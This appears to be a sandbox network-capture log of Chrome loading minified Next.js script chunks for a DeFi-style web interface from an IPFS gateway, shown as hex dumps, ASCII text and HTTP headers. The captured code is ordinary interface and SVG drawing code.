                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 35 39 39 5d 2c 7b 35 32 30 39 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 65 29 7b 76 61 72 20 74 2c 6c 2c 6e 2c 72 2c 69 2c 73 2c 6f 3d 65 28 36 37 32 39 34 29 3b 66 75 6e 63 74 69 6f 6e 20 66 28 29 7b 72 65 74 75 72 6e 20 66 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3f 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 63 3d 31 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 66 6f 72 28 76 61
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5599],{5209:function(a,c,e){var t,l,n,r,i,s,o=e(67294);function f(){return f=Object.assign?Object.assign.bind():function(a){for(var c=1;c<arguments.length;c++){var e=arguments[c];for(va
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 32 33 33 20 34 2e 30 36 39 2d 2e 33 36 33 20 38 2e 31 34 31 2d 2e 35 37 39 20 31 32 2e 32 30 38 2d 2e 31 32 36 20 32 2e 35 33 2d 2e 32 39 37 20 35 2e 30 35 38 2d 2e 34 36 20 37 2e 35 38 37 2d 2e 32 30 34 20 33 2e 34 36 33 2d 2e 34 31 37 20 36 2e 39 32 35 2d 2e 36 30 39 20 31 30 2e 33 39 61 33 33 34 2e 32 32 32 20 33 33 34 2e 32 32 32 20 30 20 30 20 30 2d 2e 32 38 39 20 36 2e 31 63 2d 2e 33 31 34 20 38 2e 39 2e 33 32 31 20 31 37 2e 37 30 38 20 32 2e 34 34 39 20 32 36 2e 33 38 33 2e 37 31 20 32 2e 38 38 34 20 31 2e 34 31 36 20 35 2e 37 37 33 20 31 2e 39 39 39 20 38 2e 36 38 34 61 31 38 2e 31 37 35 20 31 38 2e 31 37 35 20 30 20 30 20 31 2d 31 2e 30 33 20 31 30 2e 36 39 31 63 2d 31 2e 38 31 20 34 2e 33 39 34 2d 35 2e 37 38 33 20 36 2e 31 36 35 2d 39 2e 37 33
                                                                                                                                                                                                                                                  Data Ascii: 233 4.069-.363 8.141-.579 12.208-.126 2.53-.297 5.058-.46 7.587-.204 3.463-.417 6.925-.609 10.39a334.222 334.222 0 0 0-.289 6.1c-.314 8.9.321 17.708 2.449 26.383.71 2.884 1.416 5.773 1.999 8.684a18.175 18.175 0 0 1-1.03 10.691c-1.81 4.394-5.783 6.165-9.73
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 31 31 37 2e 35 31 38 2d 32 2e 38 39 36 20 31 2e 33 31 33 61 2e 34 31 32 2e 34 31 32 20 30 20 30 20 30 2d 2e 31 32 2e 32 39 35 63 2d 2e 30 31 33 2e 31 36 2e 30 32 38 2e 33 32 2e 31 31 36 2e 34 35 34 61 2e 34 36 2e 34 36 20 30 20 30 20 30 20 2e 34 32 34 2e 31 31 35 63 2e 33 2d 2e 31 33 33 2e 35 38 34 2d 2e 33 30 32 2e 38 34 34 2d 2e 35 30 34 61 32 2e 37 33 32 20 32 2e 37 33 32 20 30 20 30 20 31 20 32 2e 37 39 35 2d 2e 33 35 39 63 2e 34 35 2e 31 39 34 2e 38 38 33 2e 34 32 34 20 31 2e 32 39 35 2e 36 38 39 61 2e 33 35 32 2e 33 35 32 20 30 20 30 20 31 20 2e 31 30 34 2e 32 39 35 2e 33 36 32 2e 33 36 32 20 30 20 30 20 31 2d 2e 31 36 38 2e 32 36 35 63 2d 2e 31 39 36 2e 30 39 37 2d 2e 34 2e 31 38 31 2d 2e 36 30 33 2e 32 36 38 61 37 2e 36 39 33 20 37 2e 36 39 33 20
                                                                                                                                                                                                                                                  Data Ascii: 117.518-2.896 1.313a.412.412 0 0 0-.12.295c-.013.16.028.32.116.454a.46.46 0 0 0 .424.115c.3-.133.584-.302.844-.504a2.732 2.732 0 0 1 2.795-.359c.45.194.883.424 1.295.689a.352.352 0 0 1 .104.295.362.362 0 0 1-.168.265c-.196.097-.4.181-.603.268a7.693 7.693
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 20 31 2d 39 2e 34 35 2e 33 35 36 20 37 2e 33 33 20 37 2e 33 33 20 30 20 30 20 31 2d 32 2e 31 31 37 2d 32 2e 36 35 36 63 2d 2e 33 31 33 2d 2e 36 34 31 2d 2e 35 33 39 2d 31 2e 33 32 36 2d 2e 38 32 36 2d 31 2e 39 38 61 31 35 2e 35 39 20 31 35 2e 35 39 20 30 20 30 20 30 2d 2e 39 39 36 2d 32 2e 30 38 32 63 2d 2e 39 32 32 2d 31 2e 34 36 35 2d 32 2e 33 38 38 2d 31 2e 37 38 35 2d 33 2e 38 34 2d 2e 38 32 34 61 31 35 2e 37 34 35 20 31 35 2e 37 34 35 20 30 20 30 20 30 2d 31 2e 38 37 33 20 31 2e 36 31 32 63 2d 2e 37 32 38 2e 36 37 2d 31 2e 33 39 36 20 31 2e 34 30 34 2d 32 2e 31 35 20 32 2e 30 35 2d 32 2e 34 33 33 20 32 2e 30 38 2d 35 2e 32 34 20 32 2e 36 32 32 2d 38 2e 33 33 39 20 31 2e 39 36 35 61 38 2e 38 39 33 20 38 2e 38 39 33 20 30 20 30 20 31 2d 35 2e 36 33 35
                                                                                                                                                                                                                                                  Data Ascii: 1-9.45.356 7.33 7.33 0 0 1-2.117-2.656c-.313-.641-.539-1.326-.826-1.98a15.59 15.59 0 0 0-.996-2.082c-.922-1.465-2.388-1.785-3.84-.824a15.745 15.745 0 0 0-1.873 1.612c-.728.67-1.396 1.404-2.15 2.05-2.433 2.08-5.24 2.622-8.339 1.965a8.893 8.893 0 0 1-5.635
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 38 37 2e 32 39 34 63 33 2e 39 35 39 2e 32 35 38 20 37 2e 39 33 33 2d 31 2e 35 31 33 20 39 2e 37 33 34 2d 35 2e 39 30 38 61 31 38 2e 31 37 38 20 31 38 2e 31 37 38 20 30 20 30 20 30 20 31 2e 30 35 35 2d 31 30 2e 36 38 38 63 2d 2e 35 38 34 2d 32 2e 39 31 32 2d 31 2e 32 38 39 2d 35 2e 38 2d 31 2e 39 39 39 2d 38 2e 36 38 35 2d 32 2e 31 32 38 2d 38 2e 36 37 34 2d 32 2e 37 36 33 2d 31 37 2e 34 38 32 2d 32 2e 34 34 39 2d 32 36 2e 33 38 33 2e 30 36 39 2d 32 2e 30 33 33 2e 31 36 35 2d 34 2e 30 36 37 2e 32 38 39 2d 36 2e 31 2e 31 39 32 2d 33 2e 34 36 34 2e 33 38 34 2d 36 2e 39 32 39 2e 36 30 39 2d 31 30 2e 33 39 2e 31 35 2d 32 2e 35 33 2e 33 32 31 2d 35 2e 30 35 38 2e 34 35 39 2d 37 2e 35 38 36 2e 32 2d 34 2e 30 37 2e 33 33 2d 38 2e 31 34 32 2e 35 37 39 2d 31 32 2e
                                                                                                                                                                                                                                                  Data Ascii: 87.294c3.959.258 7.933-1.513 9.734-5.908a18.178 18.178 0 0 0 1.055-10.688c-.584-2.912-1.289-5.8-1.999-8.685-2.128-8.674-2.763-17.482-2.449-26.383.069-2.033.165-4.067.289-6.1.192-3.464.384-6.929.609-10.39.15-2.53.321-5.058.459-7.586.2-4.07.33-8.142.579-12.
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 31 2e 36 38 36 2d 31 2e 33 37 34 20 32 2e 38 39 37 2d 31 2e 33 31 34 20 32 2e 32 35 33 2e 30 39 39 20 33 2e 38 33 31 20 31 2e 32 32 37 20 34 2e 39 32 20 33 2e 31 31 37 2e 34 31 2e 37 31 39 2e 37 31 37 20 31 2e 34 39 35 20 31 2e 31 33 35 20 32 2e 31 38 39 2e 34 37 2e 38 37 20 31 2e 30 31 34 20 31 2e 36 39 39 20 31 2e 36 32 36 20 32 2e 34 37 35 61 36 2e 31 33 32 20 36 2e 31 33 32 20 30 20 30 20 30 20 38 2e 33 34 35 2e 39 32 32 20 39 2e 31 37 32 20 39 2e 31 37 32 20 30 20 30 20 30 20 31 2e 39 38 38 2d 32 2e 31 38 38 63 2e 34 34 33 2d 2e 36 33 32 2e 38 35 32 2d 31 2e 32 38 39 20 31 2e 33 33 2d 31 2e 39 30 35 61 37 2e 30 34 36 20 37 2e 30 34 36 20 30 20 30 20 31 20 31 2e 31 36 36 2d 31 2e 31 35 35 20 33 2e 35 32 32 20 33 2e 35 32 32 20 30 20 30 20 31 20 32 2e
                                                                                                                                                                                                                                                  Data Ascii: 1.686-1.374 2.897-1.314 2.253.099 3.831 1.227 4.92 3.117.41.719.717 1.495 1.135 2.189.47.87 1.014 1.699 1.626 2.475a6.132 6.132 0 0 0 8.345.922 9.172 9.172 0 0 0 1.988-2.188c.443-.632.852-1.289 1.33-1.905a7.046 7.046 0 0 1 1.166-1.155 3.522 3.522 0 0 1 2.
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 37 33 2d 2e 32 32 36 61 37 2e 33 38 34 20 37 2e 33 38 34 20 30 20 30 20 30 20 2e 34 37 38 20 33 2e 35 31 32 20 36 2e 33 39 31 20 36 2e 33 39 31 20 30 20 30 20 30 20 32 2e 36 39 36 20 33 2e 34 33 38 63 2e 37 32 35 2e 33 38 34 20 31 2e 34 39 2e 36 39 20 32 2e 32 37 39 2e 39 31 32 2e 32 30 35 2e 30 37 33 2e 35 38 31 2e 32 30 33 2e 36 35 39 2d 2e 31 38 33 2e 30 31 32 2d 2e 31 31 2d 2e 32 33 35 2d 2e 33 32 2d 2e 34 30 35 2d 2e 34 32 31 2d 2e 33 32 38 2d 2e 31 39 2d 2e 37 31 2d 2e 33 30 34 2d 31 2e 30 32 32 2d 2e 35 33 61 33 2e 37 34 36 20 33 2e 37 34 36 20 30 20 30 20 31 2d 31 2e 37 35 2d 32 2e 36 37 20 31 2e 36 31 20 31 2e 36 31 20 30 20 30 20 31 20 2e 36 34 33 2d 31 2e 35 39 33 63 2e 32 36 32 2d 2e 32 2e 35 37 35 2d 2e 33 34 36 2e 38 32 2d 2e 35 35 32 61 31
                                                                                                                                                                                                                                                  Data Ascii: 73-.226a7.384 7.384 0 0 0 .478 3.512 6.391 6.391 0 0 0 2.696 3.438c.725.384 1.49.69 2.279.912.205.073.581.203.659-.183.012-.11-.235-.32-.405-.421-.328-.19-.71-.304-1.022-.53a3.746 3.746 0 0 1-1.75-2.67 1.61 1.61 0 0 1 .643-1.593c.262-.2.575-.346.82-.552a1
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 39 20 36 2e 31 39 20 30 20 30 20 31 20 31 2e 34 35 36 2e 32 36 32 63 31 2e 39 30 35 2e 35 36 20 33 2e 38 39 32 2e 37 38 39 20 35 2e 38 37 35 2e 36 37 35 2e 38 38 32 2d 2e 31 20 31 2e 37 37 33 2e 30 38 20 32 2e 35 34 36 2e 35 31 34 61 32 2e 35 37 32 20 32 2e 35 37 32 20 30 20 30 20 31 20 31 2e 33 34 36 20 32 2e 36 32 35 20 34 2e 31 36 33 20 34 2e 31 36 33 20 30 20 30 20 31 2d 31 2e 36 35 35 20 32 2e 39 33 34 20 37 2e 39 36 32 20 37 2e 39 36 32 20 30 20 30 20 31 2d 35 2e 32 33 37 20 31 2e 36 35 38 20 35 2e 36 36 37 20 35 2e 36 36 37 20 30 20 30 20 30 2d 2e 37 31 34 2d 2e 30 35 33 5a 6d 2d 34 2e 31 37 33 2d 32 2e 38 34 32 63 31 2e 33 36 37 20 31 2e 30 37 35 20 32 2e 37 37 20 31 2e 38 33 37 20 34 2e 33 39 37 20 31 2e 38 39 32 20 31 2e 34 30 33 2e 30 34 36 20
                                                                                                                                                                                                                                                  Data Ascii: 9 6.19 0 0 1 1.456.262c1.905.56 3.892.789 5.875.675.882-.1 1.773.08 2.546.514a2.572 2.572 0 0 1 1.346 2.625 4.163 4.163 0 0 1-1.655 2.934 7.962 7.962 0 0 1-5.237 1.658 5.667 5.667 0 0 0-.714-.053Zm-4.173-2.842c1.367 1.075 2.77 1.837 4.397 1.892 1.403.046
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 35 32 36 2d 2e 31 32 2d 2e 37 30 35 61 35 2e 39 33 20 35 2e 39 33 20 30 20 30 20 31 20 2e 35 37 2d 31 2e 33 38 20 35 32 2e 36 37 39 20 35 32 2e 36 37 39 20 30 20 30 20 31 20 34 2e 36 31 2d 36 2e 33 37 33 20 32 32 2e 33 33 37 20 32 32 2e 33 33 37 20 30 20 30 20 31 20 38 2e 38 34 2d 36 2e 31 38 39 20 35 38 2e 37 36 36 20 35 38 2e 37 36 36 20 30 20 30 20 31 20 31 30 2e 32 38 34 2d 32 2e 39 31 34 20 31 30 35 2e 37 33 36 20 31 30 35 2e 37 33 36 20 30 20 30 20 31 20 31 34 2e 39 32 31 2d 31 2e 39 20 37 32 2e 39 31 36 20 37 32 2e 39 31 36 20 30 20 30 20 31 20 31 34 2e 33 38 2e 34 35 37 63 31 2e 30 34 38 2e 31 35 20 32 2e 31 30 38 2e 32 34 32 20 33 2e 31 36 2e 33 36 33 61 37 34 2e 38 31 32 20 37 34 2e 38 31 32 20 30 20 30 20 31 20 31 33 2e 33 37 35 20 33 2e 30 33
                                                                                                                                                                                                                                                  Data Ascii: 526-.12-.705a5.93 5.93 0 0 1 .57-1.38 52.679 52.679 0 0 1 4.61-6.373 22.337 22.337 0 0 1 8.84-6.189 58.766 58.766 0 0 1 10.284-2.914 105.736 105.736 0 0 1 14.921-1.9 72.916 72.916 0 0 1 14.38.457c1.048.15 2.108.242 3.16.363a74.812 74.812 0 0 1 13.375 3.03


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  72192.168.2.549788209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC739OUTGET /_next/static/chunks/5315-ede49da3c729b6f5.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:45 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 11336
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreie57xyrfi2gfqidueje4dvu2mlhd2lwss6jzithrh627mc23bxicy"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/5315-ede49da3c729b6f5.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreie57xyrfi2gfqidueje4dvu2mlhd2lwss6jzithrh627mc23bxicy
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028479
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 62 38 61 63 38 35 35 38 39 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42b8ac85589-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 33 31 35 5d 2c 7b 31 32 33 34 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 74 2e 64 28 6e 2c 7b 4d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 7d 7d 29 3b 76 61 72 20 72 3d 74 28 31 32 37 39 29 2c 69 3d 74 28 38 30 30 35 39 29 2c 6f 3d 74 28 33 30 31 32 30 29 2c 63 3d 74 28 32 39 36 33 30 29 2c 73 3d 74 28 38 31 36 34 35 29 2c 61 3d 74 28 36 37 32 39 34 29 2c 6c 3d 74 28 37 38 33 37 31 29 2c 64 3d 74 28 35 37 36 30 39 29 2c 70 3d 74 28 39 37 35 36 33 29 2c 78 3d 74 28 34 31 30 32 34 29 2c 75 3d 74 28 37 32 36 36 37 29 2c
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5315],{12349:function(e,n,t){t.d(n,{M:function(){return v}});var r=t(1279),i=t(80059),o=t(30120),c=t(29630),s=t(81645),a=t(67294),l=t(78371),d=t(57609),p=t(97563),x=t(41024),u=t(72667),
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 75 2e 54 31 2c 7b 73 79 6d 62 6f 6c 3a 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 53 79 6d 62 6f 6c 2c 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 32 30 70 78 22 2c 6d 72 3a 31 7d 7d 29 2c 28 30 2c 79 2e 6a 73 78 29 28 63 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 69 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 53 79 6d 62 6f 6c 7d 29 5d 7d 29 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 79 2e 6a 73 78 29 28 73 2c 7b 69 6e 63 65 6e 74 69 76 65 41 50 52 3a 65 2e 69 6e 63 65 6e 74 69 76 65 41 50 52 7d 29 7d 2c 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 41 64 64 72 65 73 73 29 7d 29 29 2c 6e 2e 6c 65 6e 67 74 68 3e 31 26 26 28 30 2c 79 2e 6a 73 78 29 28 6f 2e 5a 2c 7b 73 78 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65
                                                                                                                                                                                                                                                  Data Ascii: u.T1,{symbol:e.rewardTokenSymbol,sx:{fontSize:"20px",mr:1}}),(0,y.jsx)(c.Z,{variant:i,children:e.rewardTokenSymbol})]}),width:"100%",children:(0,y.jsx)(s,{incentiveAPR:e.incentiveAPR})},e.rewardTokenAddress)})),n.length>1&&(0,y.jsx)(o.Z,{sx:function(e){re
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 52 61 64 69 75 73 3a 22 34 70 78 22 2c 63 75 72 73 6f 72 3a 22 70 6f 69 6e 74 65 72 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 74 72 61 6e 73 69 74 69 6f 6e 3a 22 6f 70 61 63 69 74 79 20 30 2e 32 73 20 65 61 73 65 22 2c 62 67 63 6f 6c 6f 72 3a 76 3f 22 61 63 74 69 6f 6e 2e 68 6f 76 65 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 26 3a 68 6f 76 65 72 22 3a 7b 62 67 63 6f 6c 6f 72 3a 22 61 63 74 69 6f 6e 2e 68 6f 76 65 72 22 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 22 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 22 7d 7d 7d 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 67 28 64 2e 68 31 2e 56 49 45
                                                                                                                                                                                                                                                  Data Ascii: Radius:"4px",cursor:"pointer",display:"flex",alignItems:"center",justifyContent:"center",transition:"opacity 0.2s ease",bgcolor:v?"action.hover":"transparent","&:hover":{bgcolor:"action.hover",borderColor:"action.disabled"}}},onClick:function(){g(d.h1.VIE
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 73 79 6d 62 6f 6c 2c 74 3d 65 2e 76 61 6c 75 65 2c 61 3d 65 2e 69 6e 63 65 6e 74 69 76 65 73 2c 6c 3d 65 2e 76 61 72 69 61 6e 74 2c 64 3d 76 6f 69 64 20 30 3d 3d 3d 6c 3f 22 73 65 63 6f 6e 64 61 72 79 31 34 22 3a 6c 2c 70 3d 65 2e 73 79 6d 62 6f 6c 73 56 61 72 69 61 6e 74 2c 78 3d 65 2e 61 6c 69 67 6e 2c 75 3d 65 2e 63 6f 6c 6f 72 2c 66 3d 65 2e 74 6f 6f 6c 74 69 70 3b 72 65 74 75 72 6e 28 30 2c 73 2e 6a 73 78 73 29 28 72 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 78 7c 7c 7b 78 73 3a 22 66 6c 65 78 2d 65 6e 64 22 2c 78 73 6d 3a 22 63 65 6e 74 65 72 22 7d 2c 6a 75 73 74 69
                                                                                                                                                                                                                                                  Data Ascii: unction(e){var n=e.symbol,t=e.value,a=e.incentives,l=e.variant,d=void 0===l?"secondary14":l,p=e.symbolsVariant,x=e.align,u=e.color,f=e.tooltip;return(0,s.jsxs)(r.Z,{sx:{display:"flex",flexDirection:"column",alignItems:x||{xs:"flex-end",xsm:"center"},justi
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 20 65 7d 76 61 72 20 6a 3d 7b 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 70 3a 22 32 70 78 22 2c 6d 74 3a 22 32 70 78 22 2c 63 75 72 73 6f 72 3a 22 70 6f 69 6e 74 65 72 22 2c 22 26 3a 68 6f 76 65 72 22 3a 7b 6f 70 61 63 69 74 79 3a 2e 36 7d 7d 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 63 6f 6c 6f 72 3b 72 65 74 75 72 6e 28 30 2c 78 2e 6a 73 78 29 28 63 2e 5a 2c 7b 73 78 3a 7b 6d 6c 3a 22 33 70 78 22 2c 63 6f 6c 6f 72 3a 6e 7c 7c 22 74 65 78 74 2e 6d 75 74 65 64 22 2c 66 6f 6e 74 53 69 7a 65 3a 22 31 34 70 78 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 78 2e 6a 73 78 29 28 6f 2e 5a 2c 7b 7d
                                                                                                                                                                                                                                                  Data Ascii: e}var j={borderRadius:"4px",display:"inline-flex",alignItems:"center",p:"2px",mt:"2px",cursor:"pointer","&:hover":{opacity:.6}},y=function(e){var n=e.color;return(0,x.jsx)(c.Z,{sx:{ml:"3px",color:n||"text.muted",fontSize:"14px"},children:(0,x.jsx)(o.Z,{}
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 2e 22 7d 29 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 78 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 73 78 3a 6a 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 78 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 63 6f 6c 6f 72 3a 22 65 72 72 6f 72 2e 6d 61 69 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 78 2e 6a 73 78 29 28 69 2e 63 43 2c 7b 69 64 3a 22 55 6e 61 76 61 69 6c 61 62 6c 65 22 7d 29 7d 29 2c 28 30 2c 78 2e 6a 73 78 29 28 79 2c 7b 7d 29 5d 7d 29 7d 29 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 63 6f 6e 74 65 6e 74 3b 72 65 74 75 72 6e 28 30 2c 78 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 78 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 7b 6d 62 3a
                                                                                                                                                                                                                                                  Data Ascii: ."})}),children:(0,x.jsxs)(a.Z,{sx:j,children:[(0,x.jsx)(l.Z,{variant:"description",color:"error.main",children:(0,x.jsx)(i.cC,{id:"Unavailable"})}),(0,x.jsx)(y,{})]})})},m=function(e){var n=e.content;return(0,x.jsxs)(a.Z,{children:[(0,x.jsx)(a.Z,{sx:{mb:
